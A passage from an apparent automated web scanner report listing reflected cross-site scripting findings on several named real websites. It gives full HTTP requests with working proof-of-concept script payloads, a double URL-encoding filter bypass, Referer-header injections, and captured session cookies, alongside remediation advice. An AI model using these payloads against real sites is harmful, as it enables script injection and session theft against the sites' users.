There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/sailing?24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.905. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/todays-top-stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7919d"><script>alert(1)</script>5cd07914ed6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/todays-top-stories?7919d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd07914ed6=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.906. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/resources
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb978"><script>alert(1)</script>a8bf595a39d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /resources?fb978%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8bf595a39d=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.907. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/site-map
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17af3"><script>alert(1)</script>2f10cb93dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /site-map?17af3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f10cb93dd=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.908. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/subscription-services
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9451c"><script>alert(1)</script>3c5155b61bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /subscription-services?9451c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c5155b61bf=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.909. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/subscription-services/preview-current-issue
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4df85"><script>alert(1)</script>bb520f082cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb520f082cd=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of the 376e5%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd8e"><script>alert(1)</script>bb5d19de2cf was submitted in the 376e5%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?376e5%22%3E%3Cscript%3Ealert(1afd8e"><script>alert(1)</script>bb5d19de2cf HTTP/1.1 Host: www.zvents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb4e6"><script>alert(1)</script>1714e2f256f was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f HTTP/1.1 Host: www.zvents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(document.cookiefb4e6"><script>alert(1)</script>1714e2f256f" /> ...[SNIP]...
4.912. http://www.zvents.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zvents.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd62"><script>alert(1)</script>659b6a21bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?afd62"><script>alert(1)</script>659b6a21bfe=1 HTTP/1.1 Host: www.zvents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de173"><a>1d1177c0c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /albany-nyde173"><a>1d1177c0c73/events HTTP/1.1 Host: www.zvents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-nyde173"><a>1d1177c0c73/events" /> ...[SNIP]...
4.914. http://www.zvents.com/albany-ny/events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zvents.com
Path:
/albany-ny/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46253"><script>alert(1)</script>561e7e31c43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/events?46253"><script>alert(1)</script>561e7e31c43=1 HTTP/1.1 Host: www.zvents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 909ef"-alert(1)-"44de56eaa23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=909ef"-alert(1)-"44de56eaa23 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6D8A06AB61E2CD22ACDBB645CBD9740D; Path=/ Content-Type: text/html Content-Length: 7086 Date: Sat, 29 Jan 2011 01:55:06 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20871"-alert(1)-"47bce010404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=20871"-alert(1)-"47bce010404
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=07CB13A74C1386A227CBF5EF34B9112E; Path=/ Content-Type: text/javascript Content-Length: 6853 Date: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: br.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6a328'-alert(1)-'eadcfd684a2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e0d'-alert(1)-'85ef759ec87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=97e0d'-alert(1)-'85ef759ec87
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9536b'-alert(1)-'e58569d4bd5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /waccess/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9536b'-alert(1)-'e58569d4bd5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6236'-alert(1)-'6b063b5f82a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e6236'-alert(1)-'6b063b5f82a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
